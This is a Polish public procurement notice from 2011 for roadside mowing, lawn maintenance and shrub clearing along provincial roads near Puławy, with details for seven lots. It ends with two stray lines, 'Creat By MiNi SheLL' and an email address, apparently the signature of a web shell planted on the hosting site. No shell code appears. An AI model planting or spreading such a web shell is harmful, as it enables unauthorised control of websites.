<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Puławach, ul. Składowa 1a, 24-100 Puławy, pok. nr 11 (cena 11 zł) lub poczta elektroniczną po wcześniejszym przesłaniu zamówienia na adres: rdw.pulawy@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2011 godzina 08:00, miejsce: Rejon Dróg Wojewódzkich w Puławach, ul. Składowa 1a, 24-100 Puławy, pok. nr 12, otwarcie ofert nastąpi w dniu 02.03.2011 r., o godz. 8:30 w pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr 81 886 41 03, 886 31 63, drogą elektroniczną na adres: rdw.pulawy@zdw.lublin.pl lub pocztą za zwrotnym poświadczeniem odbioru.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron, na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z Wykonawcami:
1. W sprawach technicznych - inż. Tomasz Kwiatkowski, tel. 81 886 31 63,
2. W sprawach formalno - prawnych, związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Artur Wiak - Sekcja techniczna, Tel. 81 886 31 63.
UWAGA!
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w innych sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem (81 886 41 03) lub pocztą elektroniczną na adres: rdw.pulawy@zdw.lublin.pl , zawierającej podstawowe dane firmy (nazwa adres nr telefonu i faksu, adres poczty elektronicznej). Wykonawcy którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np. zapytaniach wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia zwołaniu przez Zamawiającego zebrania wszystkich Wykonawców przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Koszenie traw i chwastów z poboczy dróg wojewódzkich nr 738, 741, 743, 801, 824, 826, 830, 832, 845, 860 na terenie Obwodu Drogowego w Puławach z wyłączeniem miast: Puławy, Nałęczów i Dęblin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:
a. koszenie obustronne, w ciągu roku, w okresie od  kwietnia do września 2011 r. w maksymalnej ilości  209,80 ha;
b. usunięcie przed każdym koszeniem zanieczyszczeń takich jak kamienie, gruz, puszki, butelki itp. i wywiezienie ich na składowisko odpadów  
c. koszenie ręczne oraz z użyciem kosiarek bijakowych całej szerokości pasa drogowego, z uwzględnieniem poboczy, rowów, skarp, przeciwskarp oraz wykoszenie wlotów skrzyżowań z drogami o nawierzchni bitumicznej na dł. 20 m). Przyjęte szerokości koszenia zawiera załącznik I - przedmiar usług . 
d. ręczne koszenie w miejscach niedostępnych tj. przy słupkach znaków drogowych,  słupkach prowadzących, barierach energochłonnych itp. Zakres usługi obejmuje również wykoszenie do wymaganej szerokości terenu za barierami drogowymi
e. zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. wykaz powierzchni objętych koszeniem na poszczególnych drogach RDW przedstawia Załącznik I Przedmiar usług. 
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. Zamawiający zastrzega sobie możliwość zmniejszenia zakresu koszenia. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Wartość zadania - 123 108,54 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5, 77.34.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Koszenie traw i chwastów z poboczy dróg wojewódzkich nr 747, 755, 759, 817, 824, 825, 854, 855, 857, 900 na terenie Obwodu Drogowego w Annopolu z wyłączeniem miasta Opole Lubelskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:
a. koszenie obustronne w ciągu roku w okresie od  kwietnia do września 2011 r. w maksymalnej ilości  214,68 ha;
b. usunięcie przed każdym koszeniem zanieczyszczeń takich jak kamienie, gruz, puszki, butelki itp. i wywiezienie ich na składowisko odpadów  
c. koszenie ręczne oraz z użyciem kosiarek bijakowych całej szerokości pasa drogowego, z uwzględnieniem poboczy, rowów, skarp, przeciwskarp oraz wykoszenie wlotów skrzyżowań z drogami o nawierzchni bitumicznej na dł. 20 m). Przyjęte szerokości koszenia zawiera załącznik I - przedmiar usług. 
d. ręczne koszenie w miejscach niedostępnych tj. przy słupkach znaków drogowych,  słupkach prowadzących, barierach energochłonnych itp. Zakres usługi obejmuje również wykoszenie do wymaganej szerokości terenu za barierami drogowymi
e. Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. wykaz powierzchni objętych koszeniem na poszczególnych drogach RDW przedstawia Załącznik I Przedmiar usług. 
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. Zamawiający zastrzega sobie możliwość zmniejszenia zakresu koszenia. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Wartość zamówienia - 128 165,27 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5, 77.34.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich nr 801, 824 i 851 na terenie miasta Puławy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:
a. Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - siedmiokrotnie w okresie kwiecień - październik 2011 na powierzchni 5,57 ha;
b. Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów w okresie marzec - kwiecień 2011 na powierzchni 5,57 ha; 
c. Dwukrotne jesienne porządkowe grabienie trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie  wrzesień - listopad 2011  na powierzchni  5,57 ha;
d. Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2011r.
e. Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik I - przedmiar usług.
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług,
b) przesunięcia ilości usług między asortymentami
Wartość zadania - 48 718,84 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich  nr 826 i 830 na terenie miasta Nałęczów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:
a. Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - siedmiokrotne w okresie kwiecień - październik 2011 na powierzchni 3,18 ha;
b. Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów w okresie marzec - kwiecień 2011 na powierzchni 3,18 ha; 
c. Dwukrotne jesienne porządkowe grabienie  trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie  wrzesień - listopad 2011  na powierzchni  3,18 ha;
d. Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2011r.
e. Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik I - przedmiar usług
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług,
b) przesunięcia ilości usług między asortymentami
Wartość zadania - 44 843,34 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich  nr 801    i 831 na terenie miasta Dęblin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:
a. Koszenie trawników wraz z wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - siedmiokrotnie w okresie kwiecień - październik 2011 na powierzchni 1,90 ha;
b. Jednokrotne wiosenne porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów w okresie marzec - kwiecień 2011 na powierzchni 1,90 ha;
c. Dwukrotne jesienne porządkowe grabienie trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie wrzesień - listopad 2011  na powierzchni  1,90 ha;
d. Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2011r.
e. Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik I - przedmiar usług
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług,
b) przesunięcia ilości usług między asortymentami
Wartość zadania - 20 084,90 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - wycinka samosiejek rosnących wzdłuż dróg wojewódzkich nr 747, 824, 825 i 857 na terenie Obwodu Drogowego w Annopolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje wycinkę krzewów i samosiejek na drogach nr :747, 824, 825 i 857, na łącznej powierzchni 1,92 ha, przy zakrzewieniu - porośnięciu gęstym.        
Usługi polegać będą na:
a. wycince krzewów i samosiejek w wieku do 10 lat na wskazanych drogach, na całej szerokości pasa drogowego, z uwzględnieniem poboczy, skarp, rowów oraz przeciwskarp; szczegółowy wykaz odcinków objętych usługą zawiera załącznik I - przedmiar usług  
b. uprzątnięciu z pasa drogowego wyciętych krzaków i samosiejek, które stanowią własność Wykonawcy poprzez rozdrobnienie w rębakach lub wywóz na składowisko odpadów. Zabrania się palenia wyciętych krzewów i samosiejek na miejscu robót.    
c. realizacji prac zgodnie ze Specyfikacją Techniczną.
d. zapewnieniu, w rejonie prowadzonych prac bezpiecznych warunków ruchu  drogowego i pieszego zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, przekazanym przez Zamawiającego 
Zamawiający zastrzega sobie możliwość zmniejszenia ilości usług.
Wartość zadania - 25 869,43 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.34.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - wycinka samosiejek rosnących wzdłuż drogi wojewódzkiej nr 743 na terenie Obwodu Drogowego w Puławach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje wycinkę krzewów i samosiejek na drodze nr 743, na łącznej powierzchni 2,27 ha, przy zakrzewieniu - porośnięciu gęstym.        
Usługi polegać będą na:
a. wycince krzewów i samosiejek w wieku do 10 lat na wskazanej drodze, na całej szerokości pasa drogowego, z uwzględnieniem poboczy, skarp, rowów oraz przeciwskarp; szczegółowy wykaz odcinków objętych usługą zawiera załącznik I - przedmiar usług  
b. uprzątnięciu z pasa drogowego wyciętych krzaków i samosiejek, które stanowią własność Wykonawcy poprzez rozdrobnienie w rębakach lub wywóz na składowisko odpadów. Zabrania się palenia wyciętych krzewów i samosiejek na miejscu robót.    
c. realizacji prac zgodnie ze Specyfikacją Techniczną.
d. zapewnieniu, w rejonie prowadzonych prac bezpiecznych warunków ruchu  drogowego i pieszego zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, przekazanym przez Zamawiającego 
Zamawiający zastrzega sobie możliwość zmniejszenia ilości usług,
Wartość zadania - 30 585,21 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.34.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com